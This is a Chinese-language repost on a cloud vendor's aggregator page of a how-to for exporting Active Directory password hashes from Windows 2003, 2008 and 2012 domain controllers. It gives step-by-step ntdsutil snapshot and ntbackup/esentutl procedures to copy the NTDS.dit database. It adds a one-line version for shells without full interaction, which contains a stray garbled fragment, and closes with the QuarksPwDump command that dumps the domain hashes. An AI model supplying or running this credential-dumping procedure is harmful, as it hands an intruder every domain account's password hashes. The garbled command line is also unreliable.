首頁 > 開發者 > Windows

windows 2003 windows 2008 windows 2012 匯出域控hash的方法

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

標籤:ida   overwrite   body   sed   log   hub   tin   database   snap   

quarkspwdump作者介紹的用法:
1. Windows 2008
   
  Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
  filesystem snapshots while the operating is running and writing to current backuped files.
   
  Here is a way to backup NTDS.dit file while a domain controller is running:
   
  #ntdsutil
  #snapshot
  #activate instance ntds
  #create
  #mount {GUID}
  #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
  #unmount {GUID}
  #quit
  #quit
   
  If AD server hasn‘t the "AD DS role", you have to use dsdbutil.exe command in the same way.
   
   
   
 2. Windows 2003  
  On this version, VSS has been implemented but not NTDS-type snapshots.
  But you can use ntbackup tool, here is the procedure:
   
  - Launch NTBACKUP gui
  - Use backup wizard (advanced)
  - Choose to save system state only and choose output filename
  - Wait some minutes
  - Use restore wizard (advanced)
  - Choise your backup, click next and use advanced button
  - Choose to restore file on another location (c:\tmp\ for example)
  - Choose to overwrite everything and next uncheck all restoration parameters
  - Validate and wait some minutes
  - Open a command shell to "c:\tmp\Active Directory"
  - We need to repair the database with this command
  #esentutl /p ntds.dit
  - Validate warning and wait some minutes
   
  ntds.dit file can now be used with quarkspwdump.

 

其中

#ntdsutil#snapshot#activate instance ntds#create#mount {GUID}#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit#unmount {GUID}#quit#quit

適用於可互動式或直接登入狀態。

如果是半互動,可以採用如下方法(網上看到的用法):

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quitntdsutil  snapshot  "mount {GUID}"  quit  quitcopy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.ditntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  Entdsutil  snapshot  "delete {GUID}"  quit  quit

 

最後

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

 

windows 2003 windows 2008 windows 2012 匯出域控hash的方法

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關關鍵詞:
sql server 2008 windows server 2012 php windows server 2003 windows 2003 help windows server 2003 repair windows 2003 iis version windows 2003 versions windows server 2003 setup
相關文章
SourceTree 免登入跳過初始設定的方法 for Windows
Windows Server 2016-Active Directory網域服務連接埠匯總
在 Windows Vista、Windows 7 和 Windows Server 2008 上設定 SharePoin...
Scrapy安裝介紹-windows版
[windows7升級]Windows Anytime Upgrade 幫你升級版本
解決MSE, Windows Update/Defender無法更新(錯誤碼0x8024402F)

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More